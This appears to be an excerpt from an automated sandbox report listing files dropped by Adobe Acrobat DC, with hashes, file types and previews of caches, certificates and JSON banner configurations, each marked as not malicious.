SHA-256:	A70AA4E41BB67C779A44528E5B3B883CCE7BA2881969D7CBC64ADDFB9830D982
SHA-512:	83EC67C7530CE736814345E4A20052A811134604759EE4208062A196038FE57668ED4B2BE2D07E3803D4CC35C8565D26CED8C5C771614AEAB9090612C620A7E6
Malicious:	false
Preview:	2024/12/23-07:39:41.938 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:39:41.939 1c10 Recovering log #3.2024/12/23-07:39:41.941 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223123946Z-194.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
Category:	dropped
Size (bytes):	66934
Entropy (8bit):	2.436424201832609
Encrypted:	false
SSDEEP:	384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
MD5:	EDF4BC620FE407C6970CDAF5585ADE74
SHA1:	FF838C5205409B571B5FA183F69EEAAE321F9AE6
SHA-256:	9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
SHA-512:	84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
Malicious:	false
Preview:	BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.438666675080822
Encrypted:	false
SSDEEP:	384:ye+ci5GieD9FiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmz5:pieD9JurVgazUpUTTGt
MD5:	7D3214C5C94D5F967C6EEF57013296AC
SHA1:	DA3B85C6A7493251839B30486BBE8235EA105C7A
SHA-256:	64A2ED5C7937E56AB91BAD57E875683B312E7518A7865FED64D81C723C9A8B72
SHA-512:	ED665CF2518445AB4791BD1078E54F88420DCDB1DEED6BA3464700E6B4474FED16F17E070B51D73ED9E4CEB651CF6E2DC9022BA9D5CC40BB87EE29D57F508ED7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.7693446052754243
Encrypted:	false
SSDEEP:	48:7MvJioyVy/ioyXcoy1C7oy16oy1p6KOioy1noy1AYoy1Wioy1oioykioyBoy1non:7wJuy/GhYyXjBiEb9IVXEBodRBkZ
MD5:	A957425AC35AF9AE3E381366327582AC
SHA1:	85BD533DCD670F099BBC8B0CA437B1105A828E04
SHA-256:	577B22930AAD1AF22A108E8ED5638C289D8AA66D1B9D6B876166E163560E6187
SHA-512:	66D503C2CAB10FB32625F2EB33607C9F9840654C02414957AA9003A3EFEAEC1576B6E1B8D06E6F171F635CBE0DFB0CD86CF7EC5AEBD5206E81CA441267673BAF
Malicious:	false
Preview:	.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.756901573172974
Encrypted:	false
SSDEEP:	3:kkFklZz/+EvfllXlE/HT8k2F7l1NNX8RolJuRdxLlGB9lQRYwpDdt:kKq+EQT8Zl7NMa8RdWBwRd
MD5:	BF3CD47746CEEED96221ED517DA0A634
SHA1:	8E3D1E8E41DD16BE5030191D13411F098B64675D
SHA-256:	40DB48ADE06353528F2E032BB20F78D32C87A059911E247209962121E05B92BD
SHA-512:	E842AC710AFA66884593D9B3C5A1C2C2E0A0EA7C8027711DF8B65F410DE7B2326CDEEEC732E108DD2B1A4C46A39410A8217DDF908BB4F44414C00E74249E951F
Malicious:	false
Preview:	p...... ..........E.7U..(....................................................... ..........W....S...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.2478978672539016
Encrypted:	false
SSDEEP:	6:kKoii9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:rdDImsLNkPlE99SNxAhUe/3
MD5:	4E4F301D2B505CD1F34B1DB5EDB8A985
SHA1:	6BC5D8EB9D9A16F41A14FD1356F6858DDCE6158B
SHA-256:	B4BF5F1CF15C4FD1B3DA8FD25FD0B86B2C7CC60F84D2CA5CF5B78D121D3754AE
SHA-512:	7D28E78D34178B9AC7671F75F4B65375B03187E38D8DB66B02BFB4C10F3C55EC789C9F2F8B843391F77EA2E84240862F7B09DA5E5BE6370698C06CD47ABB7F56
Malicious:	false
Preview:	p...... ........=.^.7U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.351086183918057
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJM3g98kUwPeUkwRe9:YvXKXU8IT5LjIP9GMbLUkee9
MD5:	AAF14749D2D3780DBAA44A76C49A2C69
SHA1:	27118391C11DDC25FC0C2F92845B51641BC09F4B
SHA-256:	7903FEA1774964D71C738C1F4A36D2F3621E00121142F0871BF6D2EEED25F851
SHA-512:	D351D93E05223B8A88C5D253DA6727CAA6AA9DB3C95FC45896807E21BDE05E5728585D3629824B194D82B7A1B1E741DC24E8B840D8E329BA622CFF62AD04A774
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.303122778197107
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfBoTfXpnrPeUkwRe9:YvXKXU8IT5LjIP9GWTfXcUkee9
MD5:	8ABAA2F00F589061228D2696A1FB1EEB
SHA1:	8C211EE803DDE126205BF094C7B58A05BBE835A4
SHA-256:	9BE56B91EB8CC332A73B71642515DE24CFF4DB9D491DA9AE1F4189F726E256A1
SHA-512:	AC441C809327A9C3F55625A51959B8CD7F1D0DBEA24BB6784772CB2711D301BBD44793B0155E9A31716915F7875CC202DDDDE9E216E5E4EC125DCA373B08DAC2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.2821178135921825
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfBD2G6UpnrPeUkwRe9:YvXKXU8IT5LjIP9GR22cUkee9
MD5:	B8B98D83BC01C9124B5B68212604AC49
SHA1:	094B40300358490AE5D2B88018820A5CA3605E13
SHA-256:	58068121F9E66310F9E82AE539292C767CD010A4F9A5DB6194E6D7FFD545A310
SHA-512:	8758AE17865F3EDCF36A0CA98D22F7401956A2852555BD280059F33B7E8D835BEE414CB5468973D6C6F7A4A27897EC4730BE5DE25A72B66C5E24246F36204674
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.331657437445251
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfPmwrPeUkwRe9:YvXKXU8IT5LjIP9GH56Ukee9
MD5:	D17C05AC933B31C0FAE8422ABC09EC49
SHA1:	C6A09B50B0B852279F6147BFB627F2EDD0FEB15D
SHA-256:	F1814CACA23185E01EE78DC44B1453700E80B8D7A15145A3F510E1B06FA7D8F6
SHA-512:	6D411AD71D8B373E73C4A0592BAF47205A3D70F5055561D2B10B3BEF85A309851984C5D8DC2767E130903E886FCE095923D6113F92890BD181A2CE458223553D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.689689795802758
Encrypted:	false
SSDEEP:	24:Yv6XuT5XIapLgE9cQx8LennAvzBvkn0RCmK8czOCCS5:YvfX3hgy6SAFv5Ah8cv/5
MD5:	09A386F4B0967918A666EC91E655416B
SHA1:	D6915806F2577903149FE7A85545E2C401CCD6BF
SHA-256:	F1C62F88EB59E0FEFCF22091DEC5EB019C3579018415488A8B95AB5C5DEEB70D
SHA-512:	5A2D9C896056A0FFB985EC2FC78F7F441D3FDCFFA3CF4C77C5C2EDDBFC947807F53A817CFB52DE930A7DCC4562972E9C470569777211AFCDA5EC88B73E19C939
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.303219078226505
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJf8dPeUkwRe9:YvXKXU8IT5LjIP9GU8Ukee9
MD5:	0B882050B4534C75EBD994CEF943EC06
SHA1:	5BAC8473F396B11FD9753DE17AFF61C2925F3CF7
SHA-256:	476A3769F4A478A277BA251D7294117D4DDAC547DC9C7E851357AA55AF01E236
SHA-512:	19D1395688086D8489005942B92393A063C910D115C7F2262F7420F9B4C996829DA9E60A56EAFF944D9CDBFFE6E91E91225A7877ECA8F905EABCC33DDBE93303
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.294724858682633
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfQ1rPeUkwRe9:YvXKXU8IT5LjIP9GY16Ukee9
MD5:	8DC3B820D7ADEF3AD55E6EEAA9EEE1CB
SHA1:	B9A51ACBAA7BC07EE884766B2FED844767E750C3
SHA-256:	B9F30A3756E411C142DCCB6B86F0DE1DC4C9EF7A8F035D0D8DFB90254F403D54
SHA-512:	139FD7D27076153D5A8E2056275D089A1628C72142B0CD744316F7393D912737D71C4DC59A1F0238DB64E7A5C011D67AA76B645948AAB6FCC6DAB277A38D9E8F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.310951482531206
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfFldPeUkwRe9:YvXKXU8IT5LjIP9Gz8Ukee9
MD5:	2273C1EDFDF5BA5B5DE1D32D43B63DA6
SHA1:	F6DB6C8F1996511CD7319A23257041EA9EB08BEA
SHA-256:	EC65456E3BD1D17B812177A7579ECA1347CE0ED7B908C62827D69160B73B0BBC
SHA-512:	9CF1254D26A702883130C99A96C56E7DB018420CDB8601CB5CD91CB5CF31C7AD363C64953744F53F1A955B9257EBDEBA5C9F6043B8E60D4CF1C3F41B6FB5532A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.328795793190048
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfzdPeUkwRe9:YvXKXU8IT5LjIP9Gb8Ukee9
MD5:	7CB07C53F1641A742EBEC2247357709F
SHA1:	AEC35E80E764568EB5A480B373880E5817F97F8C
SHA-256:	21BFA41CAAC9F772EEE878F1E097B4C6C011AA1BCDC349A2F727AE3D45624647
SHA-512:	6E2AE751ED0555A54EF273720F372E8E320E9E1F5E493D4746F8FF9C1F8D85420B6B22C1FD71D7B1F2799BE0D3D8C98C7391146A25255724FFD5F15E40C13FA9
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.309635359609509
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfYdPeUkwRe9:YvXKXU8IT5LjIP9Gg8Ukee9
MD5:	1E263823E5259198D58EF2E6A90A04BD
SHA1:	1100472FFDED091B814855F335011F6159FDFC72
SHA-256:	F6B20C8F4CE8F288B41AAD58C370C06FC389431494B681F13B646972D6595E70
SHA-512:	710D140C9346EB907C8F554F4127A55F8E931E4E36314EF32FB28497A86365BDD6DCD470DD2C541B8726116776F42419442DE92359A6E3194682C5ED277C75E6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.296154359972867
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJf+dPeUkwRe9:YvXKXU8IT5LjIP9G28Ukee9
MD5:	1354C250FB8D07B1CD4066E8EB3FC128
SHA1:	A1647EB75BBA13DA13CE0491DFFC3EE4B00A2413
SHA-256:	8B63D1F32220F1E7B45EF00434423F43CA26313E3572810E3D4A14B7F3E925EA
SHA-512:	DB1C0FDC96F6E9955191E5DC389684E01B622430CC89F80D891E189F43384D9E85604E3E60FAF79712C634D73550E544DBBF7C6B65B365D3203AB3875236F8E7
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.293116234880559
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfbPtdPeUkwRe9:YvXKXU8IT5LjIP9GDV8Ukee9
MD5:	C7C7A38F5A74B0D9030BF41D1F06193A
SHA1:	C15E76A28F70A0DF0BF2F8E1933E8A6EEC61D03B
SHA-256:	D5FD0CCE35D016253F35EFC0C1350FADE718C70CA429FA6FFCF66AE5546D7C48
SHA-512:	5A089CDD037B88863AAE0E9FA70B9D7323F53A51103F90BCE2DE04D7C72CD50E093FCDFBCA74AED39461BDB9019652B9F3F5996250BBD33903CBA6B8268671DF
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.285323910772497
Encrypted:	false
SSDEEP:	6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJf21rPeUkwRe9:YvXKXU8IT5LjIP9G+16Ukee9
MD5:	27EC52F33F466A7BB6F6524148BAE6E2
SHA1:	8E0C1E1A9C1B75D7B432F4FFDE13476076281EF3
SHA-256:	8147845216016746F5255929D58CF0A3FFA1DB13D429ABF88C9FC15CCB056187
SHA-512:	477EFEA3BEE0C97DFBE9182D5DFB7650239D7EE77CCF0A56E74B40CF842C8659982C8BD40FEAD5E5863A8E108C4443405866FBD1EB8016B46484EFB23D568B4F
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.666720771935173
Encrypted:	false
SSDEEP:	24:Yv6XuT5XIGamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS5:YvfXnBgkDMUJUAh8cvM5
MD5:	CD8422AAD585699C3A55CE468611AF08
SHA1:	41BA8F739DDB11D9D596EE51FE3DD648656A9761
SHA-256:	C87571173040065B258D7E036A057190548B20830A18B9D9F889B2927F4837F5
SHA-512:	BB7E1ED263DF62ACA33E4E9CEBB3643C450C5E0777034A0715C30966C666D13D41D071A69F69DB663B90BE6EEB044B6868EB7EFA2E7E10655DC5BF6567D69436
Malicious:	false
